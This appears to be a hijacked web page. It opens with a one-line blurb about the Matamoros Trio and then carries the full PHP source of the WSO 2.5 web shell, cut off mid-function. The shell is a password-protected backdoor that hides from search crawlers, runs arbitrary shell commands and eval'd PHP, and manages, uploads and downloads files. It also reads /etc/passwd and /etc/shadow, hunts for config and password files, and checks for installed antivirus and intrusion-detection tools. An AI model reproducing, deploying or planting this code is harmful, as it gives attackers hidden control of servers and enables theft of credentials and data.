The Sensational Matamoros Trio

They played more than ten times in the United States; Carlos Gardel applauded them in New York. They appeared in the film International Melodies and made numerous recordings for RCA Victor.

Maria del Carmen Mestas
0 comments
2006-10-04



Hi


<?php # Web Shell by oRb
$auth_pass = \"aa18683781400d32adb58a4e565a5fee\";
$color = \"#df5\";
$default_action = \'FilesMan\';
$default_use_ajax = true;
$default_charset = \'Windows-1251\';

if(!empty($_SERVER[\'HTTP_USER_AGENT\'])) {
$userAgents = array(\"Google\", \"Slurp\", \"MSNBot\", \"ia_archiver\", \"Yandex\", \"Rambler\");
if(preg_match(\'/\' . implode(\'|\', $userAgents) . \'/i\', $_SERVER[\'HTTP_USER_AGENT\'])) {
header(\'HTTP/1.0 404 Not Found\');
exit;
}
}

@ini_set(\'error_log\',NULL);
@ini_set(\'log_errors\',0);
@ini_set(\'max_execution_time\',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define(\'WSO_VERSION\', \'2.5\');

if(get_magic_quotes_gpc()) {
function WSOstripslashes($array) {
return is_array($array) ? array_map(\'WSOstripslashes\', $array) : stripslashes($array);
}
$_POST = WSOstripslashes($_POST);
$_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
die(\"

Password: >\'>

\");
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST[\'pass\']) && (md5($_POST[\'pass\']) == $auth_pass))
WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])]) || ($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == \"win\")
$os = \'win\';
else
$os = \'nix\';

$safe_mode = @ini_get(\'safe_mode\');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get(\'disable_functions\');
$home_cwd = @getcwd();
if(isset($_POST[\'c\']))
@chdir($_POST[\'c\']);
$cwd = @getcwd();
if($os == \'win\') {
$home_cwd = str_replace(\"\\\\\", \"/\", $home_cwd);
$cwd = str_replace(\"\\\\\", \"/\", $cwd);
}
if($cwd[strlen($cwd)-1] != \'/\')
$cwd .= \'/\';

if(!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\']))
$_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = (bool)$default_use_ajax;

if($os == \'win\')
$aliases = array(
\"List Directory\" => \"dir\",
\"Find index.php in current dir\" => \"dir /s /w /b index.php\",
\"Find *config*.php in current dir\" => \"dir /s /w /b *config*.php\",
\"Show active connections\" => \"netstat -an\",
\"Show running services\" => \"net start\",
\"User accounts\" => \"net user\",
\"Show computers\" => \"net view\",
\"ARP Table\" => \"arp -a\",
\"IP Configuration\" => \"ipconfig /all\"
);
else
$aliases = array(
\"List dir\" => \"ls -lha\",
\"list file attributes on a Linux second extended file system\" => \"lsattr -va\",
\"show opened ports\" => \"netstat -an | grep -i listen\",
\"process status\" => \"ps aux\",
\"Find\" => \"\",
\"find all suid files\" => \"find / -type f -perm -04000 -ls\",
\"find suid files in current dir\" => \"find . -type f -perm -04000 -ls\",
\"find all sgid files\" => \"find / -type f -perm -02000 -ls\",
\"find sgid files in current dir\" => \"find . -type f -perm -02000 -ls\",
\"find config.inc.php files\" => \"find / -type f -name config.inc.php\",
\"find config* files\" => \"find / -type f -name \\\"config*\\\"\",
\"find config* files in current dir\" => \"find . -type f -name \\\"config*\\\"\",
\"find all writable folders and files\" => \"find / -perm -2 -ls\",
\"find all writable folders and files in current dir\" => \"find . -perm -2 -ls\",
\"find all service.pwd files\" => \"find / -type f -name service.pwd\",
\"find service.pwd files in current dir\" => \"find . -type f -name service.pwd\",
\"find all .htpasswd files\" => \"find / -type f -name .htpasswd\",
\"find .htpasswd files in current dir\" => \"find . -type f -name .htpasswd\",
\"find all .bash_history files\" => \"find / -type f -name .bash_history\",
\"find .bash_history files in current dir\" => \"find . -type f -name .bash_history\",
\"find all .fetchmailrc files\" => \"find / -type f -name .fetchmailrc\",
\"find .fetchmailrc files in current dir\" => \"find . -type f -name .fetchmailrc\",
\"Locate\" => \"\",
\"locate httpd.conf files\" => \"locate httpd.conf\",
\"locate vhosts.conf files\" => \"locate vhosts.conf\",
\"locate proftpd.conf files\" => \"locate proftpd.conf\",
\"locate psybnc.conf files\" => \"locate psybnc.conf\",
\"locate my.conf files\" => \"locate my.conf\",
\"locate admin.php files\" =>\"locate admin.php\",
\"locate cfg.php files\" => \"locate cfg.php\",
\"locate conf.php files\" => \"locate conf.php\",
\"locate config.dat files\" => \"locate config.dat\",
\"locate config.php files\" => \"locate config.php\",
\"locate config.inc files\" => \"locate config.inc\",
\"locate config.inc.php\" => \"locate config.inc.php\",
\"locate config.default.php files\" => \"locate config.default.php\",
\"locate config* files \" => \"locate config\",
\"locate .conf files\"=>\"locate \'.conf\'\",
\"locate .pwd files\" => \"locate \'.pwd\'\",
\"locate .sql files\" => \"locate \'.sql\'\",
\"locate .htpasswd files\" => \"locate \'.htpasswd\'\",
\"locate .bash_history files\" => \"locate \'.bash_history\'\",
\"locate .mysql_history files\" => \"locate \'.mysql_history\'\",
\"locate .fetchmailrc files\" => \"locate \'.fetchmailrc\'\",
\"locate backup files\" => \"locate backup\",
\"locate dump files\" => \"locate dump\",
\"locate priv files\" => \"locate priv\"
);

function wsoHeader() {
if(empty($_POST[\'charset\']))
$_POST[\'charset\'] = $GLOBALS[\'default_charset\'];
global $color;
echo \"\" . $_SERVER[\'HTTP_HOST\'] . \" - WSO \" . WSO_VERSION .\"








\";
$freeSpace = @diskfreespace($GLOBALS[\'cwd\']);
$totalSpace = @disk_total_space($GLOBALS[\'cwd\']);
$totalSpace = $totalSpace?$totalSpace:1;
$release = @php_uname(\'r\');
$kernel = @php_uname(\'s\');
$explink = \'http://exploit-db.com/search/?action=search&filter_description=\';
if(strpos(\'Linux\', $kernel) !== false)
$explink .= urlencode(\'Linux Kernel \' . substr($release,0,6));
else
$explink .= urlencode($kernel . \' \' . substr($release,0,3));
if(!function_exists(\'posix_getegid\')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = \"?\";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid[\'name\'];
$uid = $uid[\'uid\'];
$group = $gid[\'name\'];
$gid = $gid[\'gid\'];
}

$cwd_links = \'\';
$path = explode(\"/\", $GLOBALS[\'cwd\']);
$n=count($path);
for($i=0; $i<$n-1; $i++) {
$cwd_links .= \" for($j=0; $j<=$i; $j++)
$cwd_links .= $path[$j].\'/\';
$cwd_links .= \"\\\")\'>\".$path[$i].\"/
\";
}

$charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');
$opt_charsets = \'\';
foreach($charsets as $item)
$opt_charsets .= \'\';

$m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'String tools\'=>\'StringTools\',\'Bruteforce\'=>\'Bruteforce\',\'Network\'=>\'Network\');
if(!empty($GLOBALS[\'auth_pass\']))
$m[\'Logout\'] = \'Logout\';
$m[\'Self remove\'] = \'SelfRemove\';
$menu = \'\';
foreach($m as $k => $v)
$menu .= \'
[ \'.$k.\' ]

\';

$drives = \"\";
if($GLOBALS[\'os\'] == \'win\') {
foreach(range(\'c\',\'z\') as $drive)
if(is_dir($drive.\':\\\\\'))
$drives .= \'[ \'.$drive.\' ] \';
}
echo \'

\'
. \'

\'
. \'

Uname:
User:
Php:
Hdd:
Cwd:\' . ($GLOBALS[\'os\'] == \'win\'?\'
Drives:\':\'\') . \'
\' . substr(@php_uname(), 0, 120) . \' [exploit-db.com]
\' . $uid . \' ( \' . $user . \' ) Group: \' . $gid . \' ( \' . $group . \' )
\' . @phpversion() . \' Safe mode: \' . ($GLOBALS[\'safe_mode\']?\'ON\':\'OFF\')
. \' [ phpinfo ] Datetime: \' . date(\'Y-m-d H:i:s\') . \'
\' . wsoViewSize($totalSpace) . \' Free: \' . wsoViewSize($freeSpace) . \' (\'. (int) ($freeSpace/$totalSpace*100) . \'%)
\' . $cwd_links . \' \'. wsoPermsColor($GLOBALS[\'cwd\']) . \' [ home ]
\' . $drives . \'


Server IP:
\' . @$_SERVER[\"SERVER_ADDR\"] . \'
Client IP:
\' . $_SERVER[\'REMOTE_ADDR\'] . \'

\'
. \'

\' . $menu . \'
\';
}

function wsoFooter() {
$is_writable = is_writable($GLOBALS[\'cwd\'])?\" (Writeable)\":\" (Not writable)\";
echo \"

Change dir:
>\'>
Read file:
>\'>
Make dir:$is_writable
>\'>
Make file:$is_writable
>\'>
Execute:
>\'>




Upload file:$is_writable
>\'>


\";
}

if (!function_exists(\"posix_getpwuid\") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false)) {
function posix_getpwuid($p) {return false;} }
if (!function_exists(\"posix_getgrgid\") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false)) {
function posix_getgrgid($p) {return false;} }

function wsoEx($in) {
$out = \'\';
if (function_exists(\'exec\')) {
@exec($in,$out);
$out = @join(\"\\n\",$out);
} elseif (function_exists(\'passthru\')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists(\'system\')) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists(\'shell_exec\')) {
$out = shell_exec($in);
} elseif (is_resource($f = @popen($in,\"r\"))) {
$out = \"\";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}

function wsoViewSize($s) {
if($s >= 1073741824)
return sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';
elseif($s >= 1048576)
return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';
elseif($s >= 1024)
return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';
else
return $s . \' B\';
}

function wsoPerms($p) {
if (($p & 0xC000) == 0xC000)$i = \'s\';
elseif (($p & 0xA000) == 0xA000)$i = \'l\';
elseif (($p & 0x8000) == 0x8000)$i = \'-\';
elseif (($p & 0x6000) == 0x6000)$i = \'b\';
elseif (($p & 0x4000) == 0x4000)$i = \'d\';
elseif (($p & 0x2000) == 0x2000)$i = \'c\';
elseif (($p & 0x1000) == 0x1000)$i = \'p\';
else $i = \'u\';
$i .= (($p & 0x0100) ? \'r\' : \'-\');
$i .= (($p & 0x0080) ? \'w\' : \'-\');
$i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));
$i .= (($p & 0x0020) ? \'r\' : \'-\');
$i .= (($p & 0x0010) ? \'w\' : \'-\');
$i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));
$i .= (($p & 0x0004) ? \'r\' : \'-\');
$i .= (($p & 0x0002) ? \'w\' : \'-\');
$i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));
return $i;
}

function wsoPermsColor($f) {
if (!@is_readable($f))
return \'\' . wsoPerms(@fileperms($f)) . \'\';
elseif (!@is_writable($f))
return \'\' . wsoPerms(@fileperms($f)) . \'\';
else
return \'\' . wsoPerms(@fileperms($f)) . \'\';
}

function wsoScandir($dir) {
if(function_exists(\"scandir\")) {
return scandir($dir);
} else {
$dh = opendir($dir);
while (false !== ($filename = readdir($dh)))
$files[] = $filename;
return $files;
}
}

function wsoWhich($p) {
$path = wsoEx(\'which \' . $p);
if(!empty($path))
return $path;
return false;
}

function actionSecInfo() {
wsoHeader();
echo \'

Server security information

\';
function wsoSecParam($n, $v) {
$v = trim($v);
if($v) {
echo \'\' . $n . \': \';
if(strpos($v, \"\\n\") === false)
echo $v . \'
\';
else
echo \'

\' . $v . \'

\';
}
}

wsoSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));
if(function_exists(\'apache_get_modules\'))
wsoSecParam(\'Loaded Apache modules\', implode(\', \', apache_get_modules()));
wsoSecParam(\'Disabled PHP Functions\', $GLOBALS[\'disable_functions\']?$GLOBALS[\'disable_functions\']:\'none\');
wsoSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));
wsoSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));
wsoSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));
wsoSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');
$temp=array();
if(function_exists(\'mysql_get_client_info\'))
$temp[] = \"MySql (\".mysql_get_client_info().\")\";
if(function_exists(\'mssql_connect\'))
$temp[] = \"MSSQL\";
if(function_exists(\'pg_connect\'))
$temp[] = \"PostgreSQL\";
if(function_exists(\'oci_connect\'))
$temp[] = \"Oracle\";
wsoSecParam(\'Supported databases\', implode(\', \', $temp));
echo \'
\';

if($GLOBALS[\'os\'] == \'nix\') {
wsoSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?\"yes [view]\":\'no\');
wsoSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?\"yes [view]\":\'no\');
wsoSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));
wsoSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));
if(!$GLOBALS[\'safe_mode\']) {
$userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');
$danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');
$downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');
echo \'
\';
$temp=array();
foreach ($userful as $item)
if(wsoWhich($item))
$temp[] = $item;
wsoSecParam(\'Userful\', implode(\', \',$temp));
$temp=array();
foreach ($danger as $item)
if(wsoWhich($item))
$temp[] = $item;
wsoSecParam(\'Danger\', implode(\', \',$temp));
$temp=array();
foreach ($downloaders as $item)
if(wsoWhich($item))
$temp[] = $item;
wsoSecParam(\'Downloaders\', implode(\', \',$temp));
echo \'
\';
wsoSecParam(\'HDD space\', wsoEx(\'df -h\'));
wsoSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));
echo \'
posix_getpwuid (\"Read\" /etc/passwd)

From
To

>\">

\';
if (isset ($_POST[\'p2\'], $_POST[\'p3\']) && is_numeric($_POST[\'p2\']) && is_numeric($_POST[\'p3\'])) {
$temp = \"\";
for(;$_POST[\'p2\'] <= $_POST[\'p3\'];$_POST[\'p2\']++) {
$uid = @posix_getpwuid($_POST[\'p2\']);
if ($uid)
$temp .= join(\':\',$uid).\"\\n\";
}
echo \'
\';
wsoSecParam(\'Users\', $temp);
}
}
} else {
wsoSecParam(\'OS Version\',wsoEx(\'ver\'));
wsoSecParam(\'Account Settings\',wsoEx(\'net accounts\'));
wsoSecParam(\'User Accounts\',wsoEx(\'net user\'));
}
echo \'

\';
wsoFooter();
}

function actionPhp() {
if(isset($_POST[\'ajax\'])) {
WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']) . \'ajax\', true);
ob_start();
eval($_POST[\'p1\']);
$temp = \"document.getElementById(\'PhpOutput\').style.display=\'\';document.getElementById(\'PhpOutput\').innerHTML=\'\" . addcslashes(htmlspecialchars(ob_get_clean()), \"\\n\\r\\t\\\\\'\\0\") . \"\';\\n\";
echo strlen($temp), \"\\n\", $temp;
exit;
}
if(empty($_POST[\'ajax\']) && !empty($_POST[\'p1\']))
WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']) . \'ajax\', 0);

wsoHeader();
if(isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\')) {
echo \'

PHP info

\';
ob_start();
phpinfo();
$tmp = ob_get_clean();
$tmp = preg_replace(array (
\'!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU\',
\'!td, th {(.*)}!msiU\',
\'!]+>!msiU\',
), array (
\'\',
\'.e, .v, .h, .h th {$1}\',
\'\'
), $tmp);
echo str_replace(\'


\';
}
echo \'

Execution PHP-code

\';
echo \' send using AJAX
\';
	if(!empty($_POST[\'p1\'])) {
		ob_start();
		eval($_POST[\'p1\']);
		echo htmlspecialchars(ob_get_clean());
	}
	echo \'

\';
wsoFooter();
}

function actionFilesMan() {
if (!empty ($_COOKIE[\'f\']))
$_COOKIE[\'f\'] = @unserialize($_COOKIE[\'f\']);

if(!empty($_POST[\'p1\'])) {
switch($_POST[\'p1\']) {
case \'uploadFile\':
if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\']))
echo \"Can\'t upload file!\";
break;
case \'mkdir\':
if(!@mkdir($_POST[\'p2\']))
echo \"Can\'t create new dir\";
break;
case \'delete\':
function deleteDir($path) {
$path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';
$dh = opendir($path);
while ( ($item = readdir($dh) ) !== false) {
$item = $path.$item;
if ( (basename($item) == \"..\") || (basename($item) == \".\") )
continue;
$type = filetype($item);
if ($type == \"dir\")
deleteDir($item);
else
@unlink($item);
}
closedir($dh);
@rmdir($path);
}
if(is_array(@$_POST[\'f\']))
foreach($_POST[\'f\'] as $f) {
if($f == \'..\')
continue;
$f = urldecode($f);
if(is_dir($f))
deleteDir($f);
else
@unlink($f);
}
break;
case \'paste\':
if($_COOKIE[\'act\'] == \'copy\') {
function copy_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = @opendir($c.$s);
while (($f = @readdir($h)) !== false)
if (($f != \".\") and ($f != \"..\"))
copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');
} elseif(is_file($c.$s))
@copy($c.$s, $d.$s);
}
foreach($_COOKIE[\'f\'] as $f)
copy_paste($_COOKIE[\'c\'],$f, $GLOBALS[\'cwd\']);
} elseif($_COOKIE[\'act\'] == \'move\') {
function move_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = @opendir($c.$s);
while (($f = @readdir($h)) !== false)
if (($f != \".\") and ($f != \"..\"))
copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');
} elseif(@is_file($c.$s))
@copy($c.$s, $d.$s);
}
foreach($_COOKIE[\'f\'] as $f)
@rename($_COOKIE[\'c\'].$f, $GLOBALS[\'cwd\'].$f);
} elseif($_COOKIE[\'act\'] == \'zip\') {
if(class_exists(\'ZipArchive\')) {
$zip = new ZipArchive();
if ($zip->open($_POST[\'p2\'], 1)) {
chdir($_COOKIE[\'c\']);
foreach($_COOKIE[\'f\'] as $f) {
if($f == \'..\')
continue;
if(@is_file($_COOKIE[\'c\'].$f))
$zip->addFile($_COOKIE[\'c\'].$f, $f);
elseif(@is_dir($_COOKIE[\'c\'].$f)) {
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\'/\'));
foreach ($iterator as $key=>$value) {
$zip->addFile(realpath($key), $key);
}
}
}
chdir($GLOBALS[\'cwd\']);
$zip->close();
}
}
} elseif($_COOKIE[\'act\'] == \'unzip\') {
if(class_exists(\'ZipArchive\')) {
$zip = new ZipArchive();
foreach($_COOKIE[\'f\'] as $f) {
if($zip->open($_COOKIE[\'c\'].$f)) {
$zip->extractTo($GLOBALS[\'cwd\']);
$zip->close();
}
}
}
} elseif($_COOKIE[\'act\'] == \'tar\') {
chdir($_COOKIE[\'c\']);
$_COOKIE[\'f\'] = array_map(\'escapeshellarg\', $_COOKIE[\'f\']);
wsoEx(\'tar cfzv \' . escapeshellarg($_POST[\'p2\']) . \' \' . implode(\' \', $_COOKIE[\'f\']));
chdir($GLOBALS[\'cwd\']);
}
unset($_COOKIE[\'f\']);
setcookie(\'f\', \'\', time() - 3600);
break;
default:
if(!empty($_POST[\'p1\'])) {
WSOsetcookie(\'act\', $_POST[\'p1\']);
WSOsetcookie(\'f\', serialize(@$_POST[\'f\']));
WSOsetcookie(\'c\', @$_POST[\'c\']);
}
break;
}
}
wsoHeader();
echo \'

File manager

\';
$dirContent = wsoScandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);
if($dirContent === false) { echo \'Can\\\'t open this folder!\';wsoFooter(); return; }
global $sort;
$sort = array(\'name\', 1);
if(!empty($_POST[\'p1\'])) {
if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match))
$sort = array($match[1], (int)$match[2]);
}
echo \"

\";
$dirs = $files = array();
$n = count($dirContent);
for($i=0;$i<$n;$i++) {
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = array(\'name\' => $dirContent[$i],
\'path\' => $GLOBALS[\'cwd\'].$dirContent[$i],
\'modify\' => date(\'Y-m-d H:i:s\', @filemtime($GLOBALS[\'cwd\'] . $dirContent[$i])),
\'perms\' => wsoPermsColor($GLOBALS[\'cwd\'] . $dirContent[$i]),
\'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]),
\'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]),
\'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i])
);
if(@is_file($GLOBALS[\'cwd\'] . $dirContent[$i]))
$files[] = array_merge($tmp, array(\'type\' => \'file\'));
elseif(@is_link($GLOBALS[\'cwd\'] . $dirContent[$i]))
$dirs[] = array_merge($tmp, array(\'type\' => \'link\', \'link\' => readlink($tmp[\'path\'])));
elseif(@is_dir($GLOBALS[\'cwd\'] . $dirContent[$i])&& ($dirContent[$i] != \".\"))
$dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));
}
$GLOBALS[\'sort\'] = $sort;
function wsoCmp($a, $b) {
if($GLOBALS[\'sort\'][0] != \'size\')
return strcmp(strtolower($a[$GLOBALS[\'sort\'][0]]), strtolower($b[$GLOBALS[\'sort\'][0]]))*($GLOBALS[\'sort\'][1]?1:-1);
else
return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);
}
usort($files, \"wsoCmp\");
usort($dirs, \"wsoCmp\");
$files = array_merge($dirs, $files);
$l = 0;
foreach($files as $f) {
echo \'

\';
$l = $l?0:1;
}
echo \"

 \";
if(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\']) && (($_COOKIE[\'act\'] == \'zip\') || ($_COOKIE[\'act\'] == \'tar\')))
echo \"file name:  \";
echo \">\'>

Name Size Modify Owner/Group Permissions Actions
\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');\" \' . (empty ($f[\'link\']) ? \'\' : \"title=\'{$f[\'link\']}\'\") . \'>[ \' . htmlspecialchars($f[\'name\']) . \' ]\').\' \'.(($f[\'type\']==\'file\')?wsoViewSize($f[\'size\']):$f[\'type\']).\' \'.$f[\'modify\'].\' \'.$f[\'owner\'].\'/\'.$f[\'group\'].\' \'.$f[\'perms\']
.\'
R T\'.(($f[\'type\']==\'file\')?\' E D\':\'\').\'


\";
wsoFooter();
}

function actionStringTools() {
if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));}}
if(!function_exists(\'binhex\')) {function binhex($p) {return dechex(bindec($p));}}
if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';for($i=0;$i if(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';for($i=0;$i if(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';for($i=0;$i $stringTools = array(
\'Base64 encode\' => \'base64_encode\',
\'Base64 decode\' => \'base64_decode\',
\'Url encode\' => \'urlencode\',
\'Url decode\' => \'urldecode\',
\'Full urlencode\' => \'full_urlencode\',
\'md5 hash\' => \'md5\',
\'sha1 hash\' => \'sha1\',
\'crypt\' => \'crypt\',
\'CRC32\' => \'crc32\',
\'ASCII to HEX\' => \'ascii2hex\',
\'HEX to ASCII\' => \'hex2ascii\',
\'HEX to DEC\' => \'hexdec\',
\'HEX to BIN\' => \'hex2bin\',
\'DEC to HEX\' => \'dechex\',
\'DEC to BIN\' => \'decbin\',
\'BIN to HEX\' => \'binhex\',
\'BIN to DEC\' => \'bindec\',
\'String to lower case\' => \'strtolower\',
\'String to upper case\' => \'strtoupper\',
\'Htmlspecialchars\' => \'htmlspecialchars\',
\'String length\' => \'strlen\',
);
if(isset($_POST[\'ajax\'])) {
WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true);
ob_start();
if(in_array($_POST[\'p1\'], $stringTools))
echo $_POST[\'p1\']($_POST[\'p2\']);
$temp = \"document.getElementById(\'strOutput\').style.display=\'\';document.getElementById(\'strOutput\').innerHTML=\'\".addcslashes(htmlspecialchars(ob_get_clean()),\"\\n\\r\\t\\\\\'\\0\").\"\';\\n\";
echo strlen($temp), \"\\n\", $temp;
exit;
}
if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))
WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0);
wsoHeader();
echo \'

String conversions

\';
echo \"

>\'/> send using AJAX

\";
	if(!empty($_POST[\'p1\'])) {
		if(in_array($_POST[\'p1\'], $stringTools))echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));
	}
	echo\"



Search files:

Text:
Path:
Name:
>\'>

\";

function wsoRecursiveGlob($path) {
if(substr($path, -1) != \'/\')
$path.=\'/\';
$paths = @array_unique(@array_merge(@glob($path.$_POST[\'p3\']), @glob($path.\'*\', GLOB_ONLYDIR)));
if(is_array($paths)&&@count($paths)) {
foreach($paths as $item) {
if(@is_dir($item)){
if($path!=$item)
wsoRecursiveGlob($item);
} else {
if(empty($_POST[\'p2\']) || @strpos(file_get_contents($item), $_POST[\'p2\'])!==false)
echo \"\".htmlspecialchars($item).\"
\";
}
}
}
}
if(@$_POST[\'p3\'])
wsoRecursiveGlob($_POST[\'c\']);
echo \"



Search for hash:










\";
wsoFooter();
}

function actionFilesTools() {
if( isset($_POST[\'p1\']) )
$_POST[\'p1\'] = urldecode($_POST[\'p1\']);
if(@$_POST[\'p2\']==\'download\') {
if(@is_file($_POST[\'p1\']) && @is_readable($_POST[\'p1\'])) {
ob_start(\"ob_gzhandler\", 4096);
header(\"Content-Disposition: attachment; filename=\".basename($_POST[\'p1\']));
if (function_exists(\"mime_content_type\")) {
$type = @mime_content_type($_POST[\'p1\']);
header(\"Content-Type: \" . $type);
} else
header(\"Content-Type: application/octet-stream\");
$fp = @fopen($_POST[\'p1\'], \"r\");
if($fp) {
while(!@feof($fp))
echo @fread($fp, 1024);
fclose($fp);
}
}exit;
}
if( @$_POST[\'p2\'] == \'mkfile\' ) {
if(!file_exists($_POST[\'p1\'])) {
$fp = @fopen($_POST[\'p1\'], \'w\');
if($fp) {
$_POST[\'p2\'] = \"edit\";
fclose($fp);
}
}
}
wsoHeader();
echo \'

File tools

\';
if( !file_exists(@$_POST[\'p1\']) ) {
echo \'File not exists\';
wsoFooter();
return;
}
$uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));
if(!$uid) {
$uid[\'name\'] = @fileowner($_POST[\'p1\']);
$gid[\'name\'] = @filegroup($_POST[\'p1\']);
} else $gid = @posix_getgrgid(@filegroup($_POST[\'p1\']));
echo \'Name: \'.htmlspecialchars(@basename($_POST[\'p1\'])).\' Size: \'.(is_file($_POST[\'p1\'])?wsoViewSize(filesize($_POST[\'p1\'])):\'-\').\' Permission: \'.wsoPermsColor($_POST[\'p1\']).\' Owner/Group: \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'
\';
echo \'Create time: \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' Access time: \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' Modify time: \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'

\';
if( empty($_POST[\'p2\']) )
$_POST[\'p2\'] = \'view\';
if( is_file($_POST[\'p1\']) )
$m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');
else
$m = array(\'Chmod\', \'Rename\', \'Touch\');
foreach($m as $v)
echo \'\'.((strtolower($v)==@$_POST[\'p2\'])?\'[ \'.$v.\' ]\':$v).\' \';
echo \'

\';
switch($_POST[\'p2\']) {
case \'view\':
echo \'

\';
			$fp = @fopen($_POST[\'p1\'], \'r\');
			if($fp) {
				while( !@feof($fp) )
					echo htmlspecialchars(@fread($fp, 1024));
				@fclose($fp);
			}
			echo \'

\';
break;
case \'highlight\':
if( @is_readable($_POST[\'p1\']) ) {
echo \'

\';
$code = @highlight_file($_POST[\'p1\'],true);
echo str_replace(array(\'\'), array(\'\'),$code).\'

\';
}
break;
case \'chmod\':
if( !empty($_POST[\'p3\']) ) {
$perms = 0;
for($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i)
$perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));
if(!@chmod($_POST[\'p1\'], $perms))
echo \'Can\\\'t set permissions!

\';
}
clearstatcache();
echo \'

>\">

\';
break;
case \'edit\':
